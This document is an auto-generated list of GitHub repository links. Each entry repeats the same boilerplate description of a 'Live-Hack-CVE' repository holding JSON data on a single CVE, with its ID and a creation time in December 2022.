**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6495](https://github.com/Live-Hack-CVE/CVE-2020-6495) create time: 2022-12-24T13:52:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6497](https://github.com/Live-Hack-CVE/CVE-2020-6497) create time: 2022-12-24T13:52:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6498](https://github.com/Live-Hack-CVE/CVE-2020-6498) create time: 2022-12-24T13:52:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16204](https://github.com/Live-Hack-CVE/CVE-2020-16204) create time: 2022-12-24T13:52:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16210 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16210](https://github.com/Live-Hack-CVE/CVE-2020-16210) create time: 2022-12-24T13:51:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16206](https://github.com/Live-Hack-CVE/CVE-2020-16206) create time: 2022-12-24T13:51:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6493 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6493](https://github.com/Live-Hack-CVE/CVE-2020-6493) create time: 2022-12-24T13:51:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2731](https://github.com/Live-Hack-CVE/CVE-2020-2731) create time: 2022-12-24T13:45:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2729 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2729](https://github.com/Live-Hack-CVE/CVE-2020-2729) create time: 2022-12-24T13:45:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2728](https://github.com/Live-Hack-CVE/CVE-2020-2728) create time: 2022-12-24T13:45:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2094 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2094](https://github.com/Live-Hack-CVE/CVE-2020-2094) create time: 2022-12-24T13:44:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31997](https://github.com/Live-Hack-CVE/CVE-2021-31997) create time: 2022-12-24T13:53:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22685](https://github.com/Live-Hack-CVE/CVE-2021-22685) create time: 2022-12-24T13:49:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0699 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0699](https://github.com/Live-Hack-CVE/CVE-2021-0699) create time: 2022-12-24T13:48:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43990 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43990](https://github.com/Live-Hack-CVE/CVE-2021-43990) create time: 2022-12-24T13:46:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43988 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43988](https://github.com/Live-Hack-CVE/CVE-2021-43988) create time: 2022-12-24T13:46:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43986](https://github.com/Live-Hack-CVE/CVE-2021-43986) create time: 2022-12-24T13:46:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43933 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43933](https://github.com/Live-Hack-CVE/CVE-2021-43933) create time: 2022-12-24T13:46:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38483 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38483](https://github.com/Live-Hack-CVE/CVE-2021-38483) create time: 2022-12-24T13:46:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43616 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43616](https://github.com/Live-Hack-CVE/CVE-2021-43616) create time: 2022-12-24T13:43:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3473 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3473](https://github.com/Live-Hack-CVE/CVE-2022-3473) create time: 2022-12-24T13:53:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40440 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40440](https://github.com/Live-Hack-CVE/CVE-2022-40440) create time: 2022-12-24T13:53:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40187 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40187](https://github.com/Live-Hack-CVE/CVE-2022-40187) create time: 2022-12-24T13:53:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32491](https://github.com/Live-Hack-CVE/CVE-2022-32491) create time: 2022-12-24T13:53:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32484 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32484](https://github.com/Live-Hack-CVE/CVE-2022-32484) create time: 2022-12-24T13:53:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32489 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32489](https://github.com/Live-Hack-CVE/CVE-2022-32489) create time: 2022-12-24T13:53:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32487](https://github.com/Live-Hack-CVE/CVE-2022-32487) create time: 2022-12-24T13:53:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32488 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32488](https://github.com/Live-Hack-CVE/CVE-2022-32488) create time: 2022-12-24T13:53:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32485 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32485](https://github.com/Live-Hack-CVE/CVE-2022-32485) create time: 2022-12-24T13:53:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32483 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32483](https://github.com/Live-Hack-CVE/CVE-2022-32483) create time: 2022-12-24T13:53:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31228 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31228](https://github.com/Live-Hack-CVE/CVE-2022-31228) create time: 2022-12-24T13:53:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2249](https://github.com/Live-Hack-CVE/CVE-2022-2249) create time: 2022-12-24T13:53:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3465 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3465](https://github.com/Live-Hack-CVE/CVE-2022-3465) create time: 2022-12-24T13:53:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33106 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33106](https://github.com/Live-Hack-CVE/CVE-2022-33106) create time: 2022-12-24T13:52:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40871 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40871](https://github.com/Live-Hack-CVE/CVE-2022-40871) create time: 2022-12-24T13:52:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3467](https://github.com/Live-Hack-CVE/CVE-2022-3467) create time: 2022-12-24T13:52:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41403 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41403](https://github.com/Live-Hack-CVE/CVE-2022-41403) create time: 2022-12-24T13:52:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28887](https://github.com/Live-Hack-CVE/CVE-2022-28887) create time: 2022-12-24T13:52:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38709](https://github.com/Live-Hack-CVE/CVE-2022-38709) create time: 2022-12-24T13:52:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36774](https://github.com/Live-Hack-CVE/CVE-2022-36774) create time: 2022-12-24T13:52:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41294](https://github.com/Live-Hack-CVE/CVE-2022-41294) create time: 2022-12-24T13:52:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41576 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41576](https://github.com/Live-Hack-CVE/CVE-2022-41576) create time: 2022-12-24T13:51:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41577](https://github.com/Live-Hack-CVE/CVE-2022-41577) create time: 2022-12-24T13:51:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41593](https://github.com/Live-Hack-CVE/CVE-2022-41593) create time: 2022-12-24T13:51:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41592](https://github.com/Live-Hack-CVE/CVE-2022-41592) create time: 2022-12-24T13:51:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41595 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41595](https://github.com/Live-Hack-CVE/CVE-2022-41595) create time: 2022-12-24T13:51:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41594](https://github.com/Live-Hack-CVE/CVE-2022-41594) create time: 2022-12-24T13:51:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41597 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41597](https://github.com/Live-Hack-CVE/CVE-2022-41597) create time: 2022-12-24T13:50:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41600 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41600](https://github.com/Live-Hack-CVE/CVE-2022-41600) create time: 2022-12-24T13:50:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41598 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41598](https://github.com/Live-Hack-CVE/CVE-2022-41598) create time: 2022-12-24T13:50:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8529 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8529](https://github.com/Live-Hack-CVE/CVE-2017-8529) create time: 2022-12-24T13:12:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0951 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0951](https://github.com/Live-Hack-CVE/CVE-2020-0951) create time: 2022-12-24T13:12:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8945](https://github.com/Live-Hack-CVE/CVE-2020-8945) create time: 2022-12-24T13:10:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27347 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27347](https://github.com/Live-Hack-CVE/CVE-2020-27347) create time: 2022-12-24T13:05:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15261 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15261](https://github.com/Live-Hack-CVE/CVE-2020-15261) create time: 2022-12-24T13:05:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15253](https://github.com/Live-Hack-CVE/CVE-2020-15253) create time: 2022-12-24T13:05:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28648 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28648](https://github.com/Live-Hack-CVE/CVE-2020-28648) create time: 2022-12-24T13:05:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15275](https://github.com/Live-Hack-CVE/CVE-2020-15275) create time: 2022-12-24T13:04:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19907 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19907](https://github.com/Live-Hack-CVE/CVE-2020-19907) create time: 2022-12-24T13:04:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27406 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27406](https://github.com/Live-Hack-CVE/CVE-2021-27406) create time: 2022-12-24T13:13:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46839](https://github.com/Live-Hack-CVE/CVE-2021-46839) create time: 2022-12-24T13:12:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3672 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3672](https://github.com/Live-Hack-CVE/CVE-2021-3672) create time: 2022-12-24T13:12:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43896](https://github.com/Live-Hack-CVE/CVE-2021-43896) create time: 2022-12-24T13:12:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1815](https://github.com/Live-Hack-CVE/CVE-2021-1815) create time: 2022-12-24T13:09:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46840](https://github.com/Live-Hack-CVE/CVE-2021-46840) create time: 2022-12-24T13:08:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3997](https://github.com/Live-Hack-CVE/CVE-2021-3997) create time: 2022-12-24T13:08:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36614 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36614](https://github.com/Live-Hack-CVE/CVE-2021-36614) create time: 2022-12-24T13:05:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36613 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36613](https://github.com/Live-Hack-CVE/CVE-2021-36613) create time: 2022-12-24T13:05:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39713 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39713](https://github.com/Live-Hack-CVE/CVE-2021-39713) create time: 2022-12-24T13:05:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38946](https://github.com/Live-Hack-CVE/CVE-2021-38946) create time: 2022-12-24T13:05:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3578](https://github.com/Live-Hack-CVE/CVE-2021-3578) create time: 2022-12-24T13:05:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29465 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29465](https://github.com/Live-Hack-CVE/CVE-2021-29465) create time: 2022-12-24T13:04:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36160](https://github.com/Live-Hack-CVE/CVE-2021-36160) create time: 2022-12-24T13:04:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38294](https://github.com/Live-Hack-CVE/CVE-2021-38294) create time: 2022-12-24T13:04:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28814](https://github.com/Live-Hack-CVE/CVE-2021-28814) create time: 2022-12-24T13:04:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28812 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28812](https://github.com/Live-Hack-CVE/CVE-2021-28812) create time: 2022-12-24T13:04:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33193](https://github.com/Live-Hack-CVE/CVE-2021-33193) create time: 2022-12-24T13:04:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28805](https://github.com/Live-Hack-CVE/CVE-2021-28805) create time: 2022-12-24T13:04:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28798](https://github.com/Live-Hack-CVE/CVE-2021-28798) create time: 2022-12-24T13:04:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28597 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28597](https://github.com/Live-Hack-CVE/CVE-2021-28597) create time: 2022-12-24T13:04:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28566](https://github.com/Live-Hack-CVE/CVE-2021-28566) create time: 2022-12-24T13:04:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42159](https://github.com/Live-Hack-CVE/CVE-2022-42159) create time: 2022-12-24T13:13:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42156 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42156](https://github.com/Live-Hack-CVE/CVE-2022-42156) create time: 2022-12-24T13:13:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38981 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38981](https://github.com/Live-Hack-CVE/CVE-2022-38981) create time: 2022-12-24T13:13:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2879 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2879](https://github.com/Live-Hack-CVE/CVE-2022-2879) create time: 2022-12-24T13:13:08Z

